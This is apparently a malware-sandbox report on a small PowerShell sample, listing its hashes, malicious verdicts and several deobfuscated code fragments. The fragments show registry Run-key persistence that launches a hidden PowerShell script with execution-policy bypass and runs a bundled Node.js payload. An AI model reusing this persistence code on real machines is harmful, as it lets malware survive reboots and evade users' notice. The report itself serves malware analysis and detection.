Malicious
Malicious

5ac87547074076a728cff3f24877f9ed

PowerShell
|
MD5: 5ac87547074076a728cff3f24877f9ed
|
Size: 1.57 KB
|
application/x-powershell


Print
General
Structural Analysis
Config.0
Yara Rules83
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
5ac87547074076a728cff3f24877f9ed
Sha1
b54f7dd6f6244284abd56ca72708182edcd167d6
Sha256
aacef8dd915afad6ff230073d1742eafb5fc1b4482875c6ba5d2e0c3273f7346
Sha384
6c3a4d7104dc96d29d398dde51c05aa78ad3bb7c47170dfdf1d1e9baa9965aa24d25242303b8b544967548afe4db4560
Sha512
235e1cfcfc8d7b08256146226a2bb9a8f5a6eee886a0ec4127cbde0f66f8f55d2d009e1a81a0d34f586b1468b8d16edd528f35c6e1f8589c1c3e35e934364218
SSDeep
24:4et8DaDecMUyZkYkLMhM0H8VAbs9PJ7C1Q9KjaJvKpbDLMh/lahIa5Cf2HLRm:4eDecFy2DghM0H8GkV9Kja0p3ghAWwls
TLSH
DD31231876A0DB3D41F2561F8DD796377C2A225531305B44B3BEC358FF4901E8296B96
File Structure
5ac87547074076a728cff3f24877f9ed
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
Artefacts
Name
Value
Deobfuscated PowerShell

/sc "onstart" "/rl" "highest" "/f" $regPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" $pattern = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass" $existingEntries = Get-ItemProperty -Path $regPath $existingEntries."PSObject"."Properties" | ForEach-Object if ($_."Name" -notin @("PSPath", "PSParentPath", "PSChildName", "PSDrive", "PSProvider")) { if ($_."Value" -like "*$pattern*") { Remove-ItemProperty -Path $regPath -Name $_."Name" } } $randomName = "rNprmwBkvu" $command = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\jonat\AppData\Local\nrHsSM\FhVmkEq.ps1" New-ItemProperty -Path $regPath -Name $randomName -PropertyType "String" -Value $command -Force Start-Sleep -Seconds 2 & C:/Users/jonat/AppData/Roaming/_node_x86/node/node.exe "C:\Users\jonat\AppData\Roaming\nrHsSM\index.js"

Deobfuscated PowerShell

= "Get-ItemProperty" -Path $regPath $existingEntries."PSObject"."Properties" | ForEach-Object if ($_."Name" -notin @("PSPath", "PSParentPath", "PSChildName", "PSDrive", "PSProvider")) { if ($_."Value" -like "*$pattern*") { Remove-ItemProperty -Path $regPath -Name $_."Name" } } $randomName = "rNprmwBkvu" $command = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\jonat\AppData\Local\nrHsSM\FhVmkEq.ps1" New-ItemProperty -Path $regPath -Name $randomName -PropertyType "String" -Value $command -Force Start-Sleep -Seconds 2 & C:/Users/jonat/AppData/Roaming/_node_x86/node/node.exe "C:\Users\jonat\AppData\Roaming\nrHsSM\index.js"

Deobfuscated PowerShell

-path $regPath -Name $randomName -PropertyType "String" -Value $command -Force Start-Sleep -Seconds 2 & C:/Users/jonat/AppData/Roaming/_node_x86/node/node.exe "C:\Users\jonat\AppData\Roaming\nrHsSM\index.js"

Deobfuscated PowerShell

-path $regPath -Name $randomName -PropertyType "String" -Value $command -Force Start-Sleep -Seconds 2 & c:/users/jonat/appdata/roaming/_node_x86/node/node.exe "C:\Users\jonat\AppData\Roaming\nrHsSM\index.js"

Deobfuscated PowerShell

-path $regPath -Name $randomName -PropertyType "String" -Value $command -Force Start-Sleep -Seconds 2 & c:/users/jonat/appdata/roaming/_node_x86/node/node.exe "C:\Users\jonat\AppData\Roaming\nrHsSM\index.js"

5ac87547074076a728cff3f24877f9ed (1.57 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙